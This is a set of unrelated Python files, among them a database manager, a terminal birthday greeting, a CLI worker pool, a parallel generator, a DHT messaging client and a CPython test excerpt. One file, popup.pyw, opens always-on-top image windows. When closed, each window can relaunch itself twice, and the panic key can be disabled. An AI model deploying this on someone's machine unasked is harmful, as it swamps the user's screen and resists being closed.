self.indirectSensing = self.dbc.db.indirectSensing
self.particleSensor = self.dbc.db.particleSensor
self.suggestionsML = self.dbc.db.suggestionsML
#user registration
self.config_col=self.dbc.db.config
#metadata col
self.raw_data=self.dbc.db.raw_data
#any raw data document.
self.events_col=self.dbc.db.events_col
#any events
self.fintubeMonitor=self.dbc.db.fintubeMonitor
#save fin tube radiator data, for building modeling
self.snapshots_parameters=self.dbc.db.snapshots_parameters
self.snapshots_col_rooms=self.dbc.db.snapshots_col_rooms
self.snapshots_col_appliances=self.dbc.db.snapshots_col_appliances
self.snapshots_col_users=self.dbc.db.snapshots_col_users
#snapshot storage
self.pushManagement_push_col=self.dbc.db.pushManagement_push_col
self.pushManagement_disp_col=self.dbc.db.pushManagement_disp_col
#push management timestamp storage
self.historicalCumulativeEnergy=self.dbc.db.historicalCumulativeEnergy
self.todayCumulativeEnergy=self.dbc.db.todayCumulativeEnergy
self.humanCentricZones=self.dbc.db.humanCentricZones
self.humanCentricZonesTesting=self.dbc.db.humanCentricZonesTesting
self.recommendationTimestamps = self.dbc.db.recommendationTimestamps
self._ReadConfigs()
## Data Structure Init: bipartite graph between rooms and appls
## TODO: Add a web interface to update config in db, and pull new config into memory.
self._ConstructInMemoryGraph()
## Construct bipartite graph.
# self._accumulator()
# self._GracefulReloadGraph()
## Read appliance values from database; TODO: occupants location
self._HardcodeValues()
self.watchdogInit()
def startDaemon(self):
t = Thread(target=self._backgroundLoop, args=())
t.daemon = True
t.start()
def watchdogInit(self):
self.watchdogLastSeen_User={}
self.watchdogLastSeen_Appliance={}
def SaveParameters(self, parameters):
self.snapshots_parameters.insert({
"timestamp":datetime.datetime.utcnow(),
"data":parameters
})
def ReportEnergyValue(self, applianceID, value, raw_data=None):
"maintenance tree node's energy consumption item, and update a sum value"
known_room=None
try:
if (applianceID not in self.list_of_appliances):
print("applianceID " + applianceID + " not in list of appliances.")
return
app=self.list_of_appliances[applianceID]
known_room=app["rooms"]
if value<0:
add_log("Negative value found on energy report?",{
"deviceID":applianceID,
"value":value,
"raw":raw_data
})
return
self.updateApplianceValue(app["id"], value)
except:
add_log("failed to report energy value on device",{
"known_room":known_room,
"deviceID":applianceID,
"value":value,
"raw":raw_data
})
return
def updateApplianceValue(self, applianceID, value):
self.list_of_appliances[applianceID]["value"]=int(float(value))
def constructParameterVector(self):
return
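# Illustrative usage (sketch; assumes a MongoDB instance is reachable on the
# default localhost port and the config collection already holds
# ROOM_DEFINITION / APPLIANCE_DEFINITION documents):
#   mgr = DBMgr(start_bg_thread=False)
#   mgr.ReportEnergyValue("nwc1008_light", 240)
#   print(mgr.list_of_appliances["nwc1008_light"]["value"])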
|
PyBirthdayWish.py
|
import os, random, sys
from threading import Thread
from time import sleep
import playsound
from termcolor import colored
from config import *
import numpy as np
from PIL import Image
def get_ansi_color_code(r, g, b):
if r == g and g == b:
if r < 8:
return 16
if r > 248:
return 231
return round(((r - 8) / 247) * 24) + 232
return 16 + (36 * round(r / 255 * 5)) + (6 * round(g / 255 * 5)) + round(b / 255 * 5)
def get_color(r, g, b):
return "\x1b[48;5;{}m \x1b[0m".format(int(get_ansi_color_code(r,g,b)))
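# Worked example of the mapping above: a pure red pixel (255, 0, 0) is not
# greyscale, so it maps to 16 + 36*5 + 0 + 0 = 196 (the xterm-256 red), while
# a mid grey (128, 128, 128) maps to round(((128 - 8) / 247) * 24) + 232 = 244.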
def show_image(img_path):
try:
img = Image.open(img_path)
except FileNotFoundError:
exit('Image not found.')
h = 50
w = 120
    img = img.resize((w, h), Image.LANCZOS)
img_arr = np.asarray(img)
h,w,c = img_arr.shape
for x in range(h):
print(" "*12,end='')
for y in range(w):
pix = img_arr[x][y]
print(get_color(pix[0], pix[1], pix[2]), sep='', end='')
print()
sleep(0.15)
# Importing module specified in the config file
art = __import__(f'arts.{artFile}', globals(), locals(), ['*'])
def replaceMultiple(mainString, toBeReplace, newString):
# Iterate over the list to be replaced
for elem in toBeReplace :
# Check if the element is in the main string
if elem in mainString :
# Replace the string
mainString = mainString.replace(elem, newString)
return mainString
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
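# Usage note (the path below is illustrative only): resource_path('resource/music.mp3')
# resolves against sys._MEIPASS inside a frozen PyInstaller bundle and against
# the current working directory otherwise.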
def pprint(art,time):
color_used = [random.choice(color)]
colorAttribute = []
for i in range(len(art)):
if art[i] in colorCodes:
# Color attr set to blink if 9
if art[i] == '⑨':
colorAttribute = [colorCodes[art[i]]]
# color attr none if 10
elif art[i] == '⑩':
colorAttribute = []
# Random color if R
elif art[i] == '®':
color_used = color
else:
color_used = [colorCodes[art[i]]]
print(colored(replaceMultiple(art[i],colorCodes,''),random.choice(color_used),attrs=colorAttribute),sep='', end='',flush= True);sleep(time)
show_image('./pic/km.jpg')
def pAudio():
if playAudio:
playsound.playsound(resource_path(audio), True)
# Code reader
with open(resource_path(__file__)) as f_in:
code = f_in.read()
def pcode():
# Print the code before wishing
if codePrint:
for i in range(len(code)):
print(colored(code[i], codeColor),sep='', end='',flush= True);sleep(codingSpeed)
input('\n\n'+colored('python3','blue')+colored(' PyBirthdayWish.py','yellow'))
os.system('cls' if os.name == 'nt' else 'clear')
else:
input(colored('press F11 and hit {Enter}...','blue'))
os.system('cls' if os.name == 'nt' else 'clear')
# Clearing terminal
os.system('cls' if os.name == 'nt' else 'clear')
try:
pcode()
Thread(target = pAudio).start()
Thread(target = pprint, args=(art.mainArt,speed)).start()
input()
except KeyboardInterrupt:
print(colored('\n[-] Thanks!!','red'))
os._exit(0)
|
worker.py
|
import queue
from threading import Lock
from threading import Thread
from time import sleep
from py42.exceptions import Py42ForbiddenError
from py42.exceptions import Py42HTTPError
from code42cli.errors import Code42CLIError
from code42cli.logger import get_main_cli_logger
class WorkerStats:
"""Stats about the tasks that have run."""
def __init__(self, total):
self.total = total
_total_processed = 0
_total_errors = 0
__total_processed_lock = Lock()
__total_errors_lock = Lock()
@property
def total_processed(self):
"""The total number of tasks executed."""
return self._total_processed
@property
def total_errors(self):
"""The amount of errors that occurred."""
return self._total_errors
@property
def total_successes(self):
val = self._total_processed - self._total_errors
return val if val >= 0 else 0
def __str__(self):
return "{} succeeded, {} failed out of {}".format(
self.total_successes, self._total_errors, self.total
)
def increment_total_processed(self):
"""+1 to self.total_processed"""
with self.__total_processed_lock:
self._total_processed += 1
def increment_total_errors(self):
"""+1 to self.total_errors"""
with self.__total_errors_lock:
self._total_errors += 1
class Worker:
def __init__(self, thread_count, expected_total, bar=None):
self._queue = queue.Queue()
self._thread_count = thread_count
self._stats = WorkerStats(expected_total)
self._tasks = 0
self.__started = False
self.__start_lock = Lock()
self._logger = get_main_cli_logger()
self._bar = bar
def do_async(self, func, *args, **kwargs):
"""Execute the given func asynchronously given *args and **kwargs.
Args:
func (callable): The function to execute asynchronously.
*args (iter): Positional args to pass to the function.
**kwargs (dict): Key-value args to pass to the function.
"""
if not self.__started:
with self.__start_lock:
if not self.__started:
self.__start()
self.__started = True
self._queue.put({"func": func, "args": args, "kwargs": kwargs})
self._tasks += 1
@property
def stats(self):
"""Stats about the tasks that have been executed, such as the total errors that occurred.
"""
return self._stats
def wait(self):
"""Wait for the tasks in the queue to complete. This should usually be called before
program termination."""
while self._stats.total_processed < self._tasks:
sleep(0.5)
def _process_queue(self):
while True:
try:
task = self._queue.get()
func = task["func"]
args = task["args"]
kwargs = task["kwargs"]
func(*args, **kwargs)
except Code42CLIError as err:
self._increment_total_errors()
self._logger.log_error(err)
except Py42ForbiddenError as err:
self._increment_total_errors()
self._logger.log_verbose_error(http_request=err.response.request)
self._logger.log_error(
"You do not have the necessary permissions to perform this task. "
"Try using or creating a different profile."
)
except Py42HTTPError as err:
self._increment_total_errors()
self._logger.log_verbose_error(http_request=err.response.request)
except Exception:
self._increment_total_errors()
self._logger.log_verbose_error()
finally:
self._stats.increment_total_processed()
if self._bar:
self._bar.update(1)
self._queue.task_done()
def __start(self):
for _ in range(0, self._thread_count):
t = Thread(target=self._process_queue)
t.daemon = True
t.start()
def _increment_total_errors(self):
self._stats.increment_total_errors()
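# Usage sketch: a minimal driver for Worker, using a hypothetical `square`
# task; real callers submit their own task functions the same way.
if __name__ == "__main__":

    def square(n):
        # Hypothetical task used only to illustrate do_async/wait/stats.
        print(n * n)

    worker = Worker(thread_count=2, expected_total=4)
    for n in range(4):
        worker.do_async(square, n)
    worker.wait()
    print(worker.stats)  # e.g. "4 succeeded, 0 failed out of 4"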
|
__init__.py
|
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import sys, os
if sys.version_info[0] < 3:
from Queue import Empty
else:
from queue import Empty
from multiprocessing import Process, Queue
class ExceptionItem(object):
def __init__(self, exception):
self.exception = exception
class ParallelGeneratorException(Exception):
pass
class GeneratorDied(ParallelGeneratorException):
pass
class ParallelGenerator(object):
def __init__(self,
orig_gen,
max_lookahead=None,
get_timeout=10):
"""
Creates a parallel generator from a normal one.
The elements will be prefetched up to max_lookahead
ahead of the consumer. If max_lookahead is None,
everything will be fetched.
The get_timeout parameter is the number of seconds
after which we check that the subprocess is still
alive, when waiting for an element to be generated.
Any exception raised in the generator will
be forwarded to this parallel generator.
"""
if max_lookahead:
self.queue = Queue(max_lookahead)
else:
self.queue = Queue()
def wrapped():
try:
for item in orig_gen:
self.queue.put(item)
raise StopIteration()
except Exception as e:
self.queue.put(ExceptionItem(e))
self.get_timeout = get_timeout
self.ppid = None # pid of the parent process
self.process = Process(target=wrapped)
self.process_started = False
def finish_if_possible(self):
"""
We can only terminate the child process from the parent process
"""
if self.ppid == os.getpid() and self.process:# and self.process.is_alive():
self.process.terminate()
self.process = None
self.queue = None
self.ppid = None
def __enter__(self):
"""
Starts the process
"""
self.ppid = os.getpid()
self.process.start()
self.process_started = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Kills the process
"""
        assert self.process_started and (self.ppid is None or self.ppid == os.getpid())
self.finish_if_possible()
def __next__(self):
return self.next()
def __iter__(self):
return self
def __del__(self):
self.finish_if_possible()
def next(self):
if not self.process_started:
raise ParallelGeneratorException(
"""The generator has not been started.
Please use "with ParallelGenerator(..) as g:"
""")
try:
item_received = False
while not item_received:
try:
item = self.queue.get(timeout=self.get_timeout)
item_received = True
except Empty:
# check that the process is still alive
if not self.process.is_alive():
raise GeneratorDied(
"The generator died unexpectedly.")
if type(item) == ExceptionItem:
raise item.exception
return item
except Exception:
self.finish_if_possible()
raise
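# Usage sketch: consuming a slow producer through ParallelGenerator. The
# `slow_numbers` generator is hypothetical, and the sketch assumes a fork-based
# multiprocessing start method, since the wrapped closure cannot be pickled
# under spawn.
if __name__ == "__main__":
    import time

    def slow_numbers():
        for n in range(5):
            time.sleep(0.1)  # simulate a slow producer
            yield n

    with ParallelGenerator(slow_numbers(), max_lookahead=2) as gen:
        for value in gen:
            print(value)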
|
popup.pyw
|
import os, random as rand, tkinter as tk, time, json, ctypes, pathlib, webbrowser
from tkinter import *
from tkinter import messagebox
from itertools import count, cycle
from PIL import Image, ImageTk
#Start Imported Code
#Code from: https://code.activestate.com/recipes/460509-get-the-actual-and-usable-sizes-of-all-the-monitor/
user = ctypes.windll.user32
class RECT(ctypes.Structure): #rect class for containing monitor info
_fields_ = [
('left', ctypes.c_long),
('top', ctypes.c_long),
('right', ctypes.c_long),
('bottom', ctypes.c_long)
]
def dump(self):
return map(int, (self.left, self.top, self.right, self.bottom))
class MONITORINFO(ctypes.Structure): #not strictly needed here, but kept so the imported recipe does not have to be reworked
_fields_ = [
('cbSize', ctypes.c_ulong),
('rcMonitor', RECT),
('rcWork', RECT),
('dwFlags', ctypes.c_ulong)
]
def get_monitors():
retval = []
CBFUNC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_ulong, ctypes.c_ulong, ctypes.POINTER(RECT), ctypes.c_double)
def cb(hMonitor, hdcMonitor, lprcMonitor, dwData):
r = lprcMonitor.contents
data = [hMonitor]
data.append(r.dump())
retval.append(data)
return 1
cbfunc = CBFUNC(cb)
temp = user.EnumDisplayMonitors(0, 0, cbfunc, 0)
return retval
def monitor_areas(): #all that matters from this is list(mapObj[monitor index][1])[k]; this is the list of monitor dimensions
retval = []
monitors = get_monitors()
for hMonitor, extents in monitors:
data = [hMonitor]
mi = MONITORINFO()
mi.cbSize = ctypes.sizeof(MONITORINFO)
mi.rcMonitor = RECT()
mi.rcWork = RECT()
res = user.GetMonitorInfoA(hMonitor, ctypes.byref(mi))
data.append(mi.rcMonitor.dump())
data.append(mi.rcWork.dump())
retval.append(data)
return retval
#End Imported Code
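# Usage sketch for the recipe above: each entry of monitor_areas() is
# [hMonitor, monitor_rect, work_rect]; the popup code below reads the work
# rect, e.g.
#     left, top, right, bottom = list(monitor_areas()[0][2])
#     width, height = right - left, bottom - top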
allow_scream = True
show_captions = False
has_captions = False
panic_disabled = False
extreme_mode = False
web_open = False
web_prob = 0
submission_text = 'I Submit <3'
sqLim = 800
panic_key = ''
captions = json.loads('{}')
PATH = str(pathlib.Path(__file__).parent.absolute())
os.chdir(PATH)
with open(PATH + '\\config.cfg', 'r') as cfg:
jsonObj = json.loads(cfg.read())
show_captions = int(jsonObj['showCaptions']) == 1
allow_scream = int(jsonObj['promptMod']) == 0
panic_disabled = int(jsonObj['panicDisabled']) == 1
mitosis_enabled = int(jsonObj['mitosisMode']) == 1
web_open = int(jsonObj['webPopup']) == 1
web_prob = int(jsonObj['webMod'])
sqLim = int(jsonObj['squareLim'])
panic_key = jsonObj['panicButton']
#extreme_mode = int(jsonObj['extremeMode']) == 1
if web_open:
webJsonDat = ''
if os.path.exists(PATH + '\\resource\\web.json'):
with open(PATH + '\\resource\\web.json', 'r') as webF:
webJsonDat = json.loads(webF.read())
    hasWeb = bool(webJsonDat) and len(webJsonDat['urls']) > 0
try:
with open(PATH + '\\resource\\captions.json', 'r') as capF:
captions = json.loads(capF.read())
has_captions = True
try:
submission_text = captions['subtext']
except:
print('will use default submission text')
except:
print('no captions.json')
class GImg(tk.Label):
def load(self, path, rWid, rHgt, delay=75):
self.image = Image.open(path)
self.frames = []
self.delay = delay
try:
for i in count(1):
self.frames.append(ImageTk.PhotoImage(self.image.resize((rWid, rHgt), Image.BOX).copy()))
self.image.seek(i)
except:
            print('Done registering frames. (' + str(len(self.frames)) + ')')
self.frames_ = cycle(self.frames)
def nextFrame(self):
if self.frames_:
self.config(image=next(self.frames_))
self.after(self.delay, self.nextFrame)
def unborderedWindow():
#var things
arr = os.listdir(os.path.abspath(os.getcwd()) + '\\resource\\img\\')
item = arr[rand.randrange(len(arr))]
while item.split('.')[len(item.split('.')) - 1].lower() == 'ini':
item = arr[rand.randrange(len(arr))]
image = Image.open(os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item)
gif_bool = item.split('.')[len(item.split('.')) - 1].lower() == 'gif'
border_wid_const = 5
monitor_data = monitor_areas()
data_list = list(monitor_data[rand.randrange(0, len(monitor_data))][2])
screenWid = data_list[2] - data_list[0]
screenHgt = data_list[3] - data_list[1]
#window start
root = Tk()
root.bind('<KeyPress>', lambda key: panic(key))
root.configure(bg='black')
root.overrideredirect(1)
root.frame = Frame(root, borderwidth=border_wid_const, relief=RAISED)
root.wm_attributes('-topmost', 1)
    def bResize(img) -> Image.Image:
size_source = max(img.width, img.height) / min(screenWid, screenHgt)
size_target = rand.randint(30, 70) / 100
resize_factor = size_target / size_source
        return img.resize((int(img.width * resize_factor), int(img.height * resize_factor)), Image.LANCZOS)
rImg = bResize(image)
image_ = ImageTk.PhotoImage(rImg)
#different handling for gifs vs normal images
if(not gif_bool):
label = Label(root, image=image_, bg='black')
label.grid(row=0, column=0)
else:
label = GImg(root)
label.load(path=os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item, rWid = rImg.width, rHgt = rImg.height)
label.pack()
locX = rand.randint(data_list[0], data_list[2] - (rImg.width))
locY = rand.randint(data_list[1], max(data_list[3] - (rImg.height), 0))
root.geometry('%dx%d+%d+%d' % ((rImg.width), (rImg.height), locX, locY))
if(gif_bool):
label.nextFrame()
if show_captions and has_captions:
capText = selectCaption(item)
if len(capText) > 0:
captionLabel = Label(root, text=capText, wraplength=rImg.width - border_wid_const)
captionLabel.place(x=5, y=5)
subButton = Button(root, text=submission_text, command=die)
subButton.place(x=rImg.width - 5 - subButton.winfo_reqwidth(), y=rImg.height - 5 - subButton.winfo_reqheight())
#disabled for performance
#if allow_scream:
# thread.Thread(target=lambda: scream(root)).start()
root.mainloop()
def doRoll(mod):
return mod > rand.randint(0, 100)
def urlSelect(arg):
return webJsonDat['urls'][arg] + webJsonDat['args'][arg].split(',')[rand.randrange(len(webJsonDat['args'][arg].split(',')))]
def scream(root):
while True:
time.sleep(rand.randint(1, 3))
root.focus_force()
def die():
if web_open and hasWeb and doRoll((100-web_prob) / 2):
urlPath = urlSelect(rand.randrange(len(webJsonDat['urls'])))
webbrowser.open_new(urlPath)
if mitosis_enabled:
os.startfile('popup.pyw')
os.startfile('popup.pyw')
os.kill(os.getpid(), 9)
def selectCaption(strObj):
for obj in captions['prefix']:
if strObj.startswith(obj):
ls = captions[obj]
ls.extend(captions['default'])
return ls[rand.randrange(0, len(captions[obj]))]
return captions['default'][rand.randrange(0, len(captions['default']))] if (len(captions['default']) > 0) else ''
def panic(key):
    if not panic_disabled and (key.keysym == panic_key or key.keycode == panic_key): #(the keycode check after 'or' keeps backwards compatibility)
os.startfile('panic.pyw')
try:
unborderedWindow()
except Exception as e:
messagebox.showerror('Popup Error', 'Could not show popup.\n[' + str(e) + ']')
|
dht_msg.py
|
import sys
import random
import requests
import binascii
import umsgpack
from ast import literal_eval
from future.moves.urllib.parse import urlencode
#from multiprocessing import Process as Thread, Event
from threading import Thread, Event
from pyp2p.lib import is_ip_valid, is_valid_port
from twisted.internet import defer
import json
import string
try:
from Queue import Queue # py2
except ImportError:
from queue import Queue # py3
import time
import logging
#https://www.google.com/maps/place/AbsoluteCare+Medical+Center+%26+Pharmacy/@33.8118968,-84.3943467,17z/data=!4m2!3m1!1s0x88f505a894eff833:0xadc876bfec8fc2ee
dht_msg_endpoint = "http://162.243.213.95/dht_msg.php"
dht_msg_endpoint = "http://localhost/dht_msg.php"
logging.basicConfig()
log = logging.getLogger(__name__)
LONG_POLLING = True
RESERVATION_TIMEOUT = (10 * 60) - 5
MUTEX_TIMEOUT = RESERVATION_TIMEOUT
# Keep this up to date so that, when the reservation timeout has expired,
# we're still fairly fresh on the stack.
ALIVE_TIMEOUT = 60 * 5
class DHTProtocol:
def __init__(self):
self.messages_received = None
class DHT:
def __init__(self, node_id=None, ip=None, port=0, password=None, network_id="default", debug=0, networking=1):
self.node_id = node_id or self.rand_str(20)
if sys.version_info >= (3, 0, 0):
if type(self.node_id) == str:
self.node_id = self.node_id.encode("ascii")
else:
if type(self.node_id) == unicode:
self.node_id = str(self.node_id)
self.node_id = binascii.hexlify(self.node_id).decode('utf-8')
self.password = password or self.rand_str(30)
self.ip = ip
self.port = port
self.network_id = network_id
self.check_interval = 3 # For slow connections, unfortunately.
self.last_check = 0
self.debug = debug
self.networking = networking
self.relay_links = {}
self.protocol = DHTProtocol()
self.is_registered = Event()
self.is_mutex_ready = Event()
self.is_neighbours_ready = Event()
self.handles = []
self.threads = []
self.running = 1
self.has_mutex = 0
self.neighbours = []
# Register a new "account."
if self.networking:
self.register(self.node_id, self.password)
self.is_registered.wait(5)
self.mutex_loop()
self.is_mutex_ready.wait(5)
self.alive_loop()
self.find_neighbours_loop()
self.is_neighbours_ready.wait(5)
assert(self.is_mutex_ready.is_set())
assert(self.is_registered.is_set())
self.message_handlers = set()
def stop(self):
self.running = 0
for handle in self.handles:
handle.close()
# handle.raw._fp.close()
def hook_queue(self, q):
self.protocol.messages_received = q
self.check_for_new_messages()
def retry_in_thread(self, f, args={"args": None}, check_interval=2):
def thread_loop(this_obj):
while 1:
try:
while not f(**args) and this_obj.running:
time.sleep(check_interval)
if not this_obj.running:
return
return
except Exception as e:
print(e)
time.sleep(1)
t = Thread(target=thread_loop, args=(self,))
        t.daemon = True
self.threads.append(t)
t.start()
return t
def check_for_new_messages(self):
def do(args):
for msg in self.list(self.node_id, self.password):
self.protocol.messages_received.put(msg)
return 0
if LONG_POLLING:
self.retry_in_thread(do, check_interval=0.1)
else:
self.retry_in_thread(do, check_interval=2)
def mutex_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=get_mutex&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5).text
if "1" in ret or "0" in ret:
self.has_mutex = int(ret)
self.is_mutex_ready.set()
return 0
self.retry_in_thread(do, check_interval=MUTEX_TIMEOUT)
def alive_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=last_alive&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5)
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def can_test_knode(self, id):
for neighbour in self.neighbours:
if neighbour.id == id:
if neighbour.can_test:
return 1
return 0
def has_testable_neighbours(self):
for neighbour in self.neighbours:
if neighbour.can_test:
return 1
return 0
def find_neighbours_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=find_neighbours&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"network_id": self.network_id})
# Make API call.
ret = requests.get(call, timeout=5).text
ret = json.loads(ret)
#self.is_neighbours_ready.set()
#return
if type(ret) == dict:
ret = [ret]
# Convert to kademlia neighbours.
neighbours = []
for neighbour in ret:
if not is_ip_valid(neighbour["ip"]):
continue
neighbour["port"] = int(neighbour["port"])
if not is_valid_port(neighbour["port"]):
continue
neighbour["can_test"] = int(neighbour["can_test"])
from storjkademlia.node import Node as KadNode
knode = KadNode(
id=binascii.unhexlify(neighbour["id"].encode("ascii")),
ip=neighbour["ip"],
port=neighbour["port"],
can_test=neighbour["can_test"]
)
neighbours.append(knode)
self.neighbours = neighbours
self.is_neighbours_ready.set()
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def get_neighbours(self):
return self.neighbours
def add_relay_link(self, dht):
node_id = binascii.hexlify(dht.get_id())
self.relay_links[node_id.decode("utf-8")] = dht
def debug_print(self, msg):
if self.debug:
print(str(msg))
def add_message_handler(self, handler):
self.message_handlers.add(handler)
def remove_transfer_request_handler(self, handler):
pass
def rand_str(self, length):
return ''.join(random.choice(string.digits + string.ascii_lowercase +
string.ascii_uppercase
) for i in range(length))
def register(self, node_id, password):
def do(node_id, password):
try:
# Registers a new node to receive messages.
call = dht_msg_endpoint + "?call=register&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"port": self.port}) + "&"
call += urlencode({"network_id": self.network_id})
if self.ip is not None:
call += "&" + urlencode({"ip": self.ip})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
self.is_registered.set()
return 1
except Exception as e:
self.debug_print("Register timed out in DHT msg")
self.debug_print("DHT REGISTER FAILED")
return 0
mappings = {
"node_id": node_id,
"password": password
}
self.retry_in_thread(do, mappings)
def build_dht_response(self, msg):
msg = binascii.unhexlify(msg)
msg = umsgpack.unpackb(msg)
try:
str_types = [type(u""), type(b"")]
if type(msg) in str_types:
msg = literal_eval(msg)
except:
msg = str(msg)
return msg
def serialize_message(self, msg):
msg = umsgpack.packb(msg)
msg = binascii.hexlify(msg)
return msg
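    # Note on the wire format used by the two helpers above: a message is
    # msgpack-packed and then hex-encoded, so {"cmd": "ping"} becomes roughly
    # b"81a3636d64a470696e67"; build_dht_response() reverses both steps.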
def async_dht_put(self, key, value):
d = defer.Deferred()
def do(args):
t = self.put(key, value, list_pop=0)
            while t.is_alive():
time.sleep(1)
d.callback("success")
return 1
self.retry_in_thread(do)
return d
def async_dht_get(self, key):
d = defer.Deferred()
def do(args):
ret = self.list(node_id=key, list_pop=0, timeout=5)
if len(ret):
d.callback(ret[0])
else:
d.callback(None)
return 1
self.retry_in_thread(do)
return d
def put(self, node_id, msg, list_pop=1):
def do(node_id, msg):
if node_id in self.relay_links:
relay_link = self.relay_links[node_id]
msg = self.build_dht_response(self.serialize_message(msg))
relay_link.protocol.messages_received.put_nowait(msg)
return 1
try:
# Send a message directly to a node in the "DHT"
call = dht_msg_endpoint + "?call=put&"
call += urlencode({"dest_node_id": node_id}) + "&"
msg = self.serialize_message(msg)
call += urlencode({"msg": msg}) + "&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
return 1
except Exception as e:
# Reschedule call.
self.debug_print("DHT PUT TIMED OUT")
self.debug_print(e)
self.debug_print("Rescheduling DHT PUT")
self.debug_print("PUT FAILED")
return 0
mappings = {
"node_id": node_id,
"msg": msg
}
return self.retry_in_thread(do, mappings)
def list(self, node_id=None, password=None, list_pop=1, timeout=None):
if not self.networking:
return []
node_id = node_id or self.node_id
password = password or self.password
try:
# Get messages send to us in the "DHT"
call = dht_msg_endpoint + "?call=list&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
if timeout is None:
if LONG_POLLING:
timeout = None
else:
timeout = 4
ret = requests.get(call, timeout=timeout)
self.handles.append(ret)
content_gen = ret.iter_content()
messages = ret.text
messages = json.loads(messages)
# List.
if type(messages) == dict:
messages = [messages]
# Return a list of responses.
ret = []
if type(messages) == list:
for msg in messages:
dht_response = self.build_dht_response(msg)
ret.append(dht_response)
return ret
except Exception as e:
self.debug_print("Exception in dht msg list")
return []
def direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def repeat_relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def async_direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def send_direct_message(self, node_id, msg):
if sys.version_info >= (3, 0, 0):
if type(node_id) == bytes:
node_id = binascii.hexlify(node_id).decode("utf-8")
else:
if type(node_id) == str:
node_id = binascii.hexlify(node_id).decode("utf-8")
if type(node_id) != str:
node_id = node_id.decode("utf-8")
self.put(node_id, msg)
def get_id(self):
node_id = self.node_id
if sys.version_info >= (3, 0, 0):
if type(node_id) == str:
node_id = node_id.encode("ascii")
else:
if type(node_id) == unicode:
node_id = str(node_id)
return binascii.unhexlify(node_id)
def has_messages(self):
return not self.protocol.messages_received.empty()
def get_messages(self):
result = []
if self.has_messages():
while not self.protocol.messages_received.empty():
result.append(self.protocol.messages_received.get())
# Run handlers on messages.
old_handlers = set()
for received in result:
for handler in self.message_handlers:
expiry = handler(
self,
received
)
if expiry == -1:
old_handlers.add(handler)
# Expire old handlers.
for handler in old_handlers:
self.message_handlers.remove(handler)
return result
return result
if __name__ == "__main__":
node_1 = DHT(ip="127.0.0.1", port=1337)
node_2 = DHT(ip="127.0.0.1", port=1338)
node_3 = DHT(ip="127.0.0.1", port=1339)
print(node_1.ip)
print(node_1.port)
print(node_2.neighbours)
print("Node 1 has mutex")
print(node_1.has_mutex)
print()
print("Node 2 has mutex")
print(node_2.has_mutex)
print()
print("Node 3 has mutex")
print(node_3.has_mutex)
#node1 = DHT()
#print(node1.get_id())
#print(node1.node_id)
pass
"""
node1 = DHT()
node2 = DHT()
node1.put(node2.node_id, "test")
running = 1
time.sleep(5)
node1.stop()
node2.stop()
"""
"""
#print(node2.protocol.messages_received.get())
#print(node2.get_messages())
while not node2.has_messages() and running:
for msg in node2.get_messages():
running = 0
print(msg)
print("No longer running")
"""
"""
#dht_node = DHT(node_id=b"\111" * 20, password="svymQQzF1j7FGmYf8fENs4mvRd")
dht_node = DHT(node_id=u"T", password="svymQQzF1j7FGmYf8fENs4mvRd")
x = [("a", 2), ("b!%--", 2)]
dht_node.put(dht_node.node_id, x)
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.get_id())
print(type(dht_node.get_id()))
dht_node.send_direct_message(dht_node.node_id, u"test")
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.password)
print(dht_node.list(dht_node.node_id, dht_node.password))
"""
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
